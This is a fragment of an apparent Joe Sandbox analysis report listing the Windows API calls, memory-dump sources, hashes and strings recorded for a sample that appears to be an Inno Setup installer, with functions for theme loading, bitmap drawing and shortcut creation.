                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CaptureIconic
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2277910766-0
                                                                                                                            • Opcode ID: c22591b8c3f2be6e3e416ff0957708157ed46c57fff49ed7de8fa542590db40d
                                                                                                                            • Instruction ID: 6cb7601519473143bf4e876ebf6758ccc8fc4fa751d6c6e0357a6193460a6b05
                                                                                                                            • Opcode Fuzzy Hash: c22591b8c3f2be6e3e416ff0957708157ed46c57fff49ed7de8fa542590db40d
                                                                                                                            • Instruction Fuzzy Hash: 0AF0A4723056425BD730AB2EC984AB762F69F84314B14403BE419CBFA1EB3CDCC08798
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • IsIconic.USER32(?), ref: 0042419B
                                                                                                                              • Part of subcall function 00423A84: EnumWindows.USER32(00423A1C), ref: 00423AA8
                                                                                                                              • Part of subcall function 00423A84: GetWindow.USER32(?,00000003), ref: 00423ABD
                                                                                                                              • Part of subcall function 00423A84: GetWindowLongA.USER32(?,000000EC), ref: 00423ACC
                                                                                                                              • Part of subcall function 00423A84: SetWindowPos.USER32(00000000,\AB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,004241AB,?,?,00423D73), ref: 00423B02
                                                                                                                            • SetActiveWindow.USER32(?,?,?,00423D73,00000000,0042415C), ref: 004241AF
                                                                                                                              • Part of subcall function 0042364C: ShowWindow.USER32(00410460,00000009,?,00000000,0041EDA4,0042393A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C), ref: 00423667
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$ActiveEnumIconicLongShowWindows
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2671590913-0
                                                                                                                            • Opcode ID: b2ff140757208bd7b7cc33ac29151dbeb423d1cdddd3b288bc041a56f1810338
                                                                                                                            • Instruction ID: ce5d4440ec1c13bcfda566247f28ea27228b22b89c70f7a48f218b5e8bc86154
                                                                                                                            • Opcode Fuzzy Hash: b2ff140757208bd7b7cc33ac29151dbeb423d1cdddd3b288bc041a56f1810338
                                                                                                                            • Instruction Fuzzy Hash: 55E01AA070011087DB10AFAADCC8B9632A9BB48304F55017ABD49CF35BD63CC8608724
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • NtdllDefWindowProc_A.USER32(?,?,?,?,00000000,004127D5), ref: 004127C3
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: NtdllProc_Window
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4255912815-0
                                                                                                                            • Opcode ID: 120c9c179850e2d77f2b5158c289480559fb4752f9becda92d3f5c4f199058c9
                                                                                                                            • Instruction ID: 2c049f03cfb376e3baa0368465928f91904f6d03483072bf0e6cb5f6a46bccc5
                                                                                                                            • Opcode Fuzzy Hash: 120c9c179850e2d77f2b5158c289480559fb4752f9becda92d3f5c4f199058c9
                                                                                                                            • Instruction Fuzzy Hash: 4A5102357082048FD710DB6ADA80A9BF3E5EF98314B2082BBD814C77A1D7B8AD91C75D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 00478C0E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: NtdllProc_Window
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4255912815-0
                                                                                                                            • Opcode ID: 35b14883da97521222dd4ba63ab43259808bc2fdd283b26f07d3c05bbd11cdae
                                                                                                                            • Instruction ID: 8fc52e73ba06cc46e730b07d7f7f94568764801a7b8f51cd1014d1f63996c257
                                                                                                                            • Opcode Fuzzy Hash: 35b14883da97521222dd4ba63ab43259808bc2fdd283b26f07d3c05bbd11cdae
                                                                                                                            • Instruction Fuzzy Hash: EC4148B5A44104DFCB10CF99C6888AAB7F5FB49310B64C99AF848DB701D738EE45DB58
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • ArcFourCrypt._ISCRYPT(?,?,?,0046DEA4,?,?,0046DEA4,00000000), ref: 0045D247
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CryptFour
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2153018856-0
                                                                                                                            • Opcode ID: 60613f318f2e56de1b1058283c26d55875caf569050bffc963c4b4a7e30f6a75
                                                                                                                            • Instruction ID: 5effe0378c810cd07e0217cdc1e7a72ed78fe315a0c34b067f2c35eeb24cdbba
                                                                                                                            • Opcode Fuzzy Hash: 60613f318f2e56de1b1058283c26d55875caf569050bffc963c4b4a7e30f6a75
                                                                                                                            • Instruction Fuzzy Hash: D0C09BF200420CBF650057D5ECC9C77B75CE6586547408126F7048210195726C104574
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • ArcFourCrypt._ISCRYPT(?,00000000,00000000,000003E8,0046DB14,?,0046DCF5), ref: 0045D25A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CryptFour
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2153018856-0
                                                                                                                            • Opcode ID: d774fb8793e7b9215c4f3788321c424c537fe54849dfeb2a35b58218e4d2cefe
                                                                                                                            • Instruction ID: 17600df93846144bfd8e61cd07b91608ca2a028cf3222f5d1774599e6ed580aa
                                                                                                                            • Opcode Fuzzy Hash: d774fb8793e7b9215c4f3788321c424c537fe54849dfeb2a35b58218e4d2cefe
                                                                                                                            • Instruction Fuzzy Hash: B7A002F0B80300BAFD2057F15E5EF26252C97D0F01F2084657306E90D085A56400853C
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3386271497.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 10000000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3386237698.0000000010000000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3386358489.0000000010002000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_10000000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 550b9f88123d0c3b213a5d4b99e682963a3eaac5120c60ac7846f9a0f3bba5ba
                                                                                                                            • Instruction ID: 1c94840b05858ddf3503627acbaac9226f9c4a6e1659969bf0a936c2f155f8a0
                                                                                                                            • Opcode Fuzzy Hash: 550b9f88123d0c3b213a5d4b99e682963a3eaac5120c60ac7846f9a0f3bba5ba
                                                                                                                            • Instruction Fuzzy Hash: FF11303254D3D28FC305CF2894506D6FFE4AF6A640F194AAEE1D45B203C2659549C7A2
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3386271497.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 10000000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3386237698.0000000010000000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3386358489.0000000010002000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_10000000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: aff350dcda9d135b5489d453054620cf61adfe11cc5af5bb48cdce25d513e1a9
                                                                                                                            • Instruction ID: 837d35c9df4effc004866add7a9100bdfed479f04b3922bb4bd4c5469ecd81ba
                                                                                                                            • Opcode Fuzzy Hash: aff350dcda9d135b5489d453054620cf61adfe11cc5af5bb48cdce25d513e1a9
                                                                                                                            • Instruction Fuzzy Hash:
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0044B604: GetVersionExA.KERNEL32(00000094), ref: 0044B621
                                                                                                                            • LoadLibraryA.KERNEL32(uxtheme.dll,?,0044F775,00498BF2), ref: 0044B67F
                                                                                                                            • GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044B697
                                                                                                                            • GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044B6A9
                                                                                                                            • GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044B6BB
                                                                                                                            • GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044B6CD
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6DF
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6F1
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044B703
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044B715
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044B727
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044B739
                                                                                                                            • GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044B74B
                                                                                                                            • GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044B75D
                                                                                                                            • GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044B76F
                                                                                                                            • GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044B781
                                                                                                                            • GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044B793
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044B7A5
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B7B7
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeString), ref: 0044B7C9
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeBool), ref: 0044B7DB
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeInt), ref: 0044B7ED
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeEnumValue), ref: 0044B7FF
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemePosition), ref: 0044B811
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeFont), ref: 0044B823
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeRect), ref: 0044B835
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeMargins), ref: 0044B847
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeIntList), ref: 0044B859
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemePropertyOrigin), ref: 0044B86B
                                                                                                                            • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 0044B87D
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeFilename), ref: 0044B88F
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysColor), ref: 0044B8A1
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysColorBrush), ref: 0044B8B3
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysBool), ref: 0044B8C5
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysSize), ref: 0044B8D7
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysFont), ref: 0044B8E9
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysString), ref: 0044B8FB
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysInt), ref: 0044B90D
                                                                                                                            • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0044B91F
                                                                                                                            • GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 0044B931
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetWindowTheme), ref: 0044B943
                                                                                                                            • GetProcAddress.KERNEL32(00000000,EnableThemeDialogTexture), ref: 0044B955
                                                                                                                            • GetProcAddress.KERNEL32(00000000,IsThemeDialogTextureEnabled), ref: 0044B967
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeAppProperties), ref: 0044B979
                                                                                                                            • GetProcAddress.KERNEL32(00000000,SetThemeAppProperties), ref: 0044B98B
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetCurrentThemeName), ref: 0044B99D
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeDocumentationProperty), ref: 0044B9AF
                                                                                                                            • GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground), ref: 0044B9C1
                                                                                                                            • GetProcAddress.KERNEL32(00000000,EnableTheming), ref: 0044B9D3
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressProc$LibraryLoadVersion
                                                                                                                            • String ID: CloseThemeData$DrawThemeBackground$DrawThemeEdge$DrawThemeIcon$DrawThemeParentBackground$DrawThemeText$EnableThemeDialogTexture$EnableTheming$GetCurrentThemeName$GetThemeAppProperties$GetThemeBackgroundContentRect$GetThemeBackgroundRegion$GetThemeBool$GetThemeColor$GetThemeDocumentationProperty$GetThemeEnumValue$GetThemeFilename$GetThemeFont$GetThemeInt$GetThemeIntList$GetThemeMargins$GetThemeMetric$GetThemePartSize$GetThemePosition$GetThemePropertyOrigin$GetThemeRect$GetThemeString$GetThemeSysBool$GetThemeSysColor$GetThemeSysColorBrush$GetThemeSysFont$GetThemeSysInt$GetThemeSysSize$GetThemeSysString$GetThemeTextExtent$GetThemeTextMetrics$GetWindowTheme$HitTestThemeBackground$IsAppThemed$IsThemeActive$IsThemeBackgroundPartiallyTransparent$IsThemeDialogTextureEnabled$IsThemePartDefined$OpenThemeData$SetThemeAppProperties$SetWindowTheme$uxtheme.dll
                                                                                                                            • API String ID: 1968650500-2910565190
                                                                                                                            • Opcode ID: 4248c38413e99d9464b79edb7fe9b1fdc4fa56b35b8262d24df0eec612bb70b6
                                                                                                                            • Instruction ID: e93aa9000a3b975727f71862fff1c9a8a52c50bca2d3d110ef64c9f3a3b13d35
                                                                                                                            • Opcode Fuzzy Hash: 4248c38413e99d9464b79edb7fe9b1fdc4fa56b35b8262d24df0eec612bb70b6
                                                                                                                            • Instruction Fuzzy Hash: D391A8F0A40B11ABEB00EFB5AD96A2A3BA8EB15714310067BB454DF295D778DC108FDD
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

APIs
• GetDC.USER32(00000000), ref: 0041CA40
• CreateCompatibleDC.GDI32(?), ref: 0041CA4C
• CreateBitmap.GDI32(0041A944,?,00000001,00000001,00000000), ref: 0041CA70
• CreateCompatibleBitmap.GDI32(?,0041A944,?), ref: 0041CA80
• SelectObject.GDI32(0041CE3C,00000000), ref: 0041CA9B
• FillRect.USER32(0041CE3C,?,?), ref: 0041CAD6
• SetTextColor.GDI32(0041CE3C,00000000), ref: 0041CAEB
• SetBkColor.GDI32(0041CE3C,00000000), ref: 0041CB02
• PatBlt.GDI32(0041CE3C,00000000,00000000,0041A944,?,00FF0062), ref: 0041CB18
• CreateCompatibleDC.GDI32(?), ref: 0041CB2B
• SelectObject.GDI32(00000000,00000000), ref: 0041CB5C
• SelectPalette.GDI32(00000000,00000000,00000001), ref: 0041CB74
• RealizePalette.GDI32(00000000), ref: 0041CB7D
• SelectPalette.GDI32(0041CE3C,00000000,00000001), ref: 0041CB8C
• RealizePalette.GDI32(0041CE3C), ref: 0041CB95
• SetTextColor.GDI32(00000000,00000000), ref: 0041CBAE
• SetBkColor.GDI32(00000000,00000000), ref: 0041CBC5
• BitBlt.GDI32(0041CE3C,00000000,00000000,0041A944,?,00000000,00000000,00000000,00CC0020), ref: 0041CBE1
• SelectObject.GDI32(00000000,?), ref: 0041CBEE
• DeleteDC.GDI32(00000000), ref: 0041CC04
  • Part of subcall function 0041A058: GetSysColor.USER32(?), ref: 0041A062
Memory Dump Source
• Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: ColorSelect$CreatePalette$CompatibleObject$BitmapRealizeText$DeleteFillRect
• String ID:
• API String ID: 269503290-0
• Opcode ID: 8288b1a004c19d08e53adfd80f36b756ff19622159534b91a17c952f52f31838
• Instruction ID: 91afdf38925dfcc0a19aef53af63d8b93a06df8cfedaf367688fa0d34ebdb442
• Opcode Fuzzy Hash: 8288b1a004c19d08e53adfd80f36b756ff19622159534b91a17c952f52f31838
• Instruction Fuzzy Hash: 01610071A44648AFDF10EBE9DC86FDFB7B8EB48704F10446AB504E7281D67CA940CB68
Uniqueness
• Uniqueness Score: -1.00%

APIs
• 76CCE550.OLE32(00499A74,00000000,00000001,00499774,?,00000000,004569E3), ref: 0045667E
• 76CCE550.OLE32(00499764,00000000,00000001,00499774,?,00000000,004569E3), ref: 004566A4
• SysFreeString.OLEAUT32(00000000), ref: 0045685B
Strings
• IShellLink::QueryInterface(IID_IPersistFile), xrefs: 00456904
• IShellLink::QueryInterface(IID_IPropertyStore), xrefs: 004567BD
• %ProgramFiles(x86)%\, xrefs: 0045672E
• IPropertyStore::SetValue(PKEY_AppUserModel_StartPinOption), xrefs: 004568CA
• IPersistFile::Save, xrefs: 00456962
• IPropertyStore::SetValue(PKEY_AppUserModel_ID), xrefs: 00456840
• IPropertyStore::SetValue(PKEY_AppUserModel_PreventPinning), xrefs: 004567F1
• CoCreateInstance, xrefs: 004566AF
• {pf32}\, xrefs: 0045671E
• IPropertyStore::Commit, xrefs: 004568E3
• IPropertyStore::SetValue(PKEY_AppUserModel_ExcludeFromShowInNewInstall), xrefs: 00456892
Memory Dump Source
• Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: E550$FreeString
• String ID: %ProgramFiles(x86)%\$CoCreateInstance$IPersistFile::Save$IPropertyStore::Commit$IPropertyStore::SetValue(PKEY_AppUserModel_ExcludeFromShowInNewInstall)$IPropertyStore::SetValue(PKEY_AppUserModel_ID)$IPropertyStore::SetValue(PKEY_AppUserModel_PreventPinning)$IPropertyStore::SetValue(PKEY_AppUserModel_StartPinOption)$IShellLink::QueryInterface(IID_IPersistFile)$IShellLink::QueryInterface(IID_IPropertyStore)${pf32}\
• API String ID: 491012016-2363233914
• Opcode ID: 26ac11ebc8d2bbba6934e2b7da4071208c956f88b3f37f3572524cf0602978ca
• Instruction ID: 2d3acbfbfe5134b3b68b6dcde43dfe431d970b0eaffbfac770a5f5266a6492d0
• Opcode Fuzzy Hash: 26ac11ebc8d2bbba6934e2b7da4071208c956f88b3f37f3572524cf0602978ca
• Instruction Fuzzy Hash: 39B13170A00104AFDB50DFA9C845B9E7BF8AF09706F5540AAF804E7362DB78DD48CB69
Uniqueness
• Uniqueness Score: -1.00%

APIs
• ShowWindow.USER32(?,00000005,00000000,00498768,?,?,00000000,?,00000000,00000000,?,00498B1F,00000000,00498B29,?,00000000), ref: 00498453
• CreateMutexA.KERNEL32(00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00498768,?,?,00000000,?,00000000,00000000,?,00498B1F,00000000), ref: 00498466
• ShowWindow.USER32(?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00498768,?,?,00000000,?,00000000,00000000), ref: 00498476
• MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 00498497
• ShowWindow.USER32(?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00498768,?,?,00000000,?,00000000), ref: 004984A7
  • Part of subcall function 0042D44C: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D4DA,?,?,?,00000001,?,0045607E,00000000,004560E6), ref: 0042D481
Strings
Memory Dump Source
• Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: ShowWindow$CreateFileModuleMultipleMutexNameObjectsWait
• String ID: .lst$.msg$/REG$/REGU$Inno-Setup-RegSvr-Mutex$Setup
• API String ID: 2000705611-3672972446
• Opcode ID: d895cb7c5264c7428a24ad32bd1f4b93e6c699b182eb53adebeee5f7002e5ba1
• Instruction ID: 1a66146e65e487955493167600903b91e60bc3637ed1504a34615a6495e02ea1
• Opcode Fuzzy Hash: d895cb7c5264c7428a24ad32bd1f4b93e6c699b182eb53adebeee5f7002e5ba1
• Instruction Fuzzy Hash: 5191A434A042049FDF11EBA9DC52BAE7BE5EF4A304F5144BBF500AB692DE7C9C05CA19
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GetLastError.KERNEL32(00000000,0045A994,?,?,?,?,?,00000006,?,00000000,0049785D,?,00000000,00497900), ref: 0045A846
Strings
Memory Dump Source
• Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
